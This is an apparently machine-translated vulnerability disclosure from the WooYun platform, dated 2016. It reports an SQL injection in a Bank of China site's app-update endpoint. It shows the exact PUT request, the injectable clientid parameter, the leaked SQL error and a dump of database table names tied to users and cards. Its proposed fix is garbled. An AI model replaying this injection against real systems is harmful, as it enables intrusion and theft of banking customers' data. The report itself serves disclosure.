漏洞标题 MySQL注入中国银行的一个站点（涉及管理员密码/大量用户卡号信息） 相关制造商 中国银行 漏洞作者 Aasron 提交时间 2016-05-05 10: 24 公共时间 2016-06-19 22: 10 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 Php +字符型注入，注入技术，Mysql 漏洞详细信息 PUT /interFace/getAppUpdate.php HTTP/1.1 主机: open.boc.cn 内容类型:应用程序/json 连接:关闭 接受: application/json 用户代理: ESchool/1.1 CFNetwork/758.3.15 Darwin/15.4.0 接受语言: zh-cn Accept-Encoding: gzip，deflate 内容长度: 29 {'clientid':'399'，'type':'1'} 注射参数#clientid 正常返回内容 {'clientkey':'399'，'version':'1.0.2'，'appversion':'177'，'appurl':'http: \/\/open.boc.cn \/apps \/appdownload \/41295'，'need_update':'0'，'new_function':''，'appfilesize':''，'incrementSize':''} 报告错误 ＆lt; b＆gt; MySQL服务器错误报告:数组 （ [0]=>数组 （ [message]=> MySQL查询错误 ） [1]=>数组 （ [sql]=> SELECT goods_name，ios_file，app_version，goods_id，client_key as clientkey，need_update，new_function，category_ver as appversion FROM.ec` .aps_goods` where client_key=399' ） [2]=>数组 （ Failure when receiving data from the peer | aps_affiliate_log | | aps_agency | | aps_apps | | aps_apps_bak150321 | | aps_apps_bak151205 | | aps_apps_cat | | aps_apps_relation | | aps_area_region | | aps_article | | aps_article_cat | | aps_article_cat_bak | | aps_article_comment | | aps_attribute | | aps_auction_log | | aps_auto_manage | | aps_back_goods | | aps_back_order | | aps_bank_info | | aps_banner | | aps_bonus_type | | aps_booking_goods | | aps_brand | | aps_card | | aps_card_trans_audit | | aps_cart | | aps_cat_recommend | | aps_category | | aps_collect_goods | | aps_comment | | aps_crons | | aps_custom_pads | | aps_customs | | aps_dcode | | aps_delivery_goods | | aps_delivery_order | | aps_dic_h5_interface | | aps_dic_paper_category | | aps_dic_site_letter | | aps_download_log | | aps_email_list | | aps_email_sendlist | | aps_error_log | | aps_exchange_goods | | aps_failedlogin | | aps_favourable_activity | | aps_feedback | | aps_friend_link | | aps_general_bank | | aps_general_interface | | aps_goods | | aps_goods_20141206 | | aps_goods_activity | | aps_goods_article | | aps_goods_attr | | aps_goods_bak150321 | | aps_goods_bak151205 | | aps_goods_cat | | aps_goods_gallery | | aps_goods_interface | | aps_goods_interface_bak151205 | | aps_goods_relation | | aps_goods_type | | aps_goods_whites | | aps_group_goods | | aps_interface | | aps_interface0321 | | aps_keywords | | aps_link_goods | | aps_log_conf | | aps_log_data | | aps_log_goods_download | | aps_mail_templates | | aps_manage_ip | | aps_match_goods | | aps_matchor | | aps_member_price | Failure when receiving data from the peer | aps_suppliers | | aps_tag | | aps_template | | aps_topic | | aps_user_account | | aps_user_address | | aps_user_app | | aps_user_bonus | | aps_user_feed | | aps_user_pictures | | aps_user_pictures_copy | | aps_user_rank | | aps_user_test_account | | aps_user_test_card | | aps_user_trans_audit | | aps_users | | aps_users_bak | | aps_users_bak150321 | | aps_users_bak150321_copy | | aps_users_copy | | aps_validate_code | | aps_validate_code_copy | | aps_virtual_card | | aps_volume_price | | aps_vote | | aps_vote_log | | aps_vote_option | | aps_wholesale | + ------------------------------- + 确保用户安全，无需深度测试 修理计划： 过滤马 版权声明：请注明出处Aasron @乌云